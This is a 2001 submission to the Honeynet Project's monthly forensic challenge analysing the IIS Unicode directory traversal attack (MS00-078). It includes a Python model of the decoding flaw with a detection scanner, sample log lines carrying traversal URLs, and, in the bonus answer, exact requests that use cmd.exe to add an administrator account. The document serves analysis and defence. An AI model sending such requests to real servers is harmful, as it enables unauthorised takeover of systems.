From ichinin@swipnet.se Wed Feb 14 19:13:31 2001
Date: Sun, 28 Jan 2001 09:23:42 +0100
From: Ichinin
To: project@honeynet.org
Subject: Scan12 (Scan of the month February submission)
Mailto: project@honeynet.org
Hi.
This is my submission for "Scan12" or Scan Of the month for february.
Regards,
Glenn "Ichinin" Larsson
(Security researcher)
Vasteras
Sweden
[ichinin@SUESPAMMERS.org]
_____________________________________________________________________________
### QUESTION 1: What is the operating system of the honeypot, how do
you know?
-> Most likely Windows NT 4.0, running IIS 4.0
How do I know? Well, IIRC, Win2K and NT5 (beta) were shipped with IIS 5.0.
(But then... it MAY be a vmware emulation of Nt 4.0 :o)
### QUESTION 2: What is the name of this attack?
-> To my best findings:
IIS Extended UNICODE Directory Traversal Vulnerability
( http://www.securityfocus.com/bid/1806 )
### QUESTION 3: What is the attack attempting to accomplish?
-> This particular method is attempting to list files, but
it is possible to retrieve files, move files, delete files
or even start/stop services.
### QUESTION 4: How does the attack work?
-> It uses Unicode to make IIS's path check fail: "%c0%af" is an overlong
(illegal) UTF-8 encoding of "/". The traversal check that runs on the
request does not recognise it as a path separator, so "..%c0%af.." looks
like an ordinary directory name, but when the path is later mapped to the
file system IIS's lenient decoder turns it into "../.." and the request
walks out of the web root.
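A worked model of that decode-order bug, added here as an example; it is not part of the original submission or of the honeynet capture. The virtual-directory mapping in VDIRS, the IP addresses and the log lines are assumed/constructed. vulnerable_resolve() checks for traversal before the lenient UTF-8 decode (the pre-MS00-078 order), fixed_resolve() decodes strictly and re-checks after canonicalisation, and flag_unicode_traversal() picks the pattern out of W3C-format IIS log lines:

```python
import re
from urllib.parse import unquote_to_bytes

# Assumed virtual directory -> physical directory mapping (IIS-style defaults).
VDIRS = {
    "/msadc": r"C:\Program Files\Common Files\System\msadc",
    "/scripts": r"C:\inetpub\scripts",
    "": r"C:\inetpub\wwwroot",
}

def lenient_utf8(data: bytes) -> str:
    """Pre-MS00-078 decoding: 'overlong' multi-byte forms of ASCII are accepted,
    so C0 AF -> '/' and C1 9C -> '\\'. bytes.decode('utf-8') rejects them."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        n = 2 if 0xC0 <= b < 0xE0 else 3 if 0xE0 <= b < 0xF0 else 1
        if n == 1 or i + n > len(data):
            out.append(chr(b))              # ASCII, or a truncated sequence
            i += 1
            continue
        cp = b & (0x1F if n == 2 else 0x0F)
        for c in data[i + 1:i + n]:
            cp = (cp << 6) | (c & 0x3F)
        out.append(chr(cp))
        i += n
    return "".join(out)

def escapes_root(path: str) -> bool:
    """Component-wise check: True if '..' ever climbs above the start directory.
    After %xx decoding, '..%c0%af..' is one opaque component, not '..'."""
    depth = 0
    for comp in re.split(r"[\\/]", path):
        if comp == "..":
            depth -= 1
            if depth < 0:
                return True
        elif comp not in ("", "."):
            depth += 1
    return False

def canonicalize(fs_path: str) -> str:
    """Resolve '.' and '..' like the file system; '..' at the drive root is ignored."""
    drive, _, rest = fs_path.replace("/", "\\").partition("\\")
    parts = []
    for comp in rest.split("\\"):
        if comp == "..":
            if parts:
                parts.pop()
        elif comp not in ("", "."):
            parts.append(comp)
    return drive + "\\" + "\\".join(parts)

def map_to_disk(url_path: str):
    """(physical root, canonical physical path); longest virtual dir wins."""
    for vdir in sorted(VDIRS, key=len, reverse=True):
        if url_path.lower().startswith(vdir.lower() + "/"):
            root = VDIRS[vdir]
            return root, canonicalize(root + "\\" + url_path[len(vdir) + 1:])
    return None, None

def vulnerable_resolve(url: str):
    """Unpatched order: %xx-decode, traversal check on those bytes, and only then
    the lenient UTF-8 decode while mapping to disk. None means rejected."""
    raw = unquote_to_bytes(url.split("?", 1)[0])
    if escapes_root(raw.decode("latin-1")):
        return None
    return map_to_disk(lenient_utf8(raw))[1]    # '..%c0%af..' is now '../..'

def fixed_resolve(url: str):
    """Corrected order: strict decode (overlong fails), canonicalize, re-check root."""
    try:
        decoded = unquote_to_bytes(url.split("?", 1)[0]).decode("utf-8")
    except UnicodeDecodeError:
        return None
    root, path = map_to_disk(decoded)
    if root is None or not path.lower().startswith(root.lower() + "\\"):
        return None
    return path

# Overlong 2- and 3-byte encodings of ASCII as they appear in a request line.
OVERLONG_RE = re.compile(r"%(?:c[01]%[89ab][0-9a-f]|e0%80%[89ab][0-9a-f])", re.I)

# Constructed W3C extended log lines (date time c-ip cs-username s-ip s-port
# cs-method cs-uri-stem cs-uri-query sc-status); not from the real capture.
SAMPLE_LOG = """\
2001-01-08 18:47:37 192.0.2.10 - 198.51.100.5 80 GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe /c+dir 200
2001-01-08 18:47:38 192.0.2.10 - 198.51.100.5 80 GET /scripts/..%c1%9c../winnt/system32/cmd.exe /c+dir+c: 200
2001-01-08 18:48:05 192.0.2.12 - 198.51.100.5 80 GET /msadc/msadcs.dll - 200
"""

def flag_unicode_traversal(log_text: str):
    """(client ip, uri stem, query, physical path) for every request whose
    overlong sequence would have resolved outside its vdir on unpatched IIS."""
    hits = []
    for line in log_text.splitlines():
        f = line.split()
        if len(f) < 10 or not OVERLONG_RE.search(f[7]):
            continue
        target = vulnerable_resolve(f[7])
        if target is not None and fixed_resolve(f[7]) is None:
            hits.append((f[2], f[7], f[8], target))
    return hits
```

Running flag_unicode_traversal(SAMPLE_LOG) returns the two cmd.exe requests, each resolving to C:\winnt\system32\cmd.exe, and nothing for the msadcs.dll request. A plain "/scripts/../../winnt/..." request is rejected by both resolvers; only the overlong form gets through the unpatched one.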
BONUS QUESTION: Is it possible to gain remote control of the system
using this technique? If so, how?
-> Probably as simple as opening up a telnet session to the remote
HTTP service, and executing the following HTTP requests:
"GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/" +
"system32/cmd.exe?/c+net+user+ROOT+/add"
"GET /msadc/..%c0%af../..%c0%af../..%c0%af../winnt/" +
"system32/cmd.exe?/c+net+localgroup+administrators+ROOT+/add"
Now you should have an administrative account (ROOT) that has a blank
("") password.
(Both of these HTTP requests are untested, but should work according
to the security advisory; lines wrapped for readability.)
Also, as the referenced advisory explains, a TFTP server can be installed
on another server and the TFTP.EXE command can be used to retrieve a
backdoor or other services.
Note:
The above exploit is pretty pointless(!): the intruder already can do
whatever they want with the system, and twiddling with such things as
account (or policy) changes can cause alarms (other than the IDS) to fire,
which would be a stupid thing to do by an intruder. I assume that the
event was created by an unnamed remote vulnerability scanner.
Microsoft have a security bulletin available here:
http://www.microsoft.com/technet/Security/Bulletin/ms00-078.asp
A fix is available from:
http://www.microsoft.com/ntserver/nts/downloads/critical/q269862/default.asp
(Referred to as "Web Server Folder Traversal")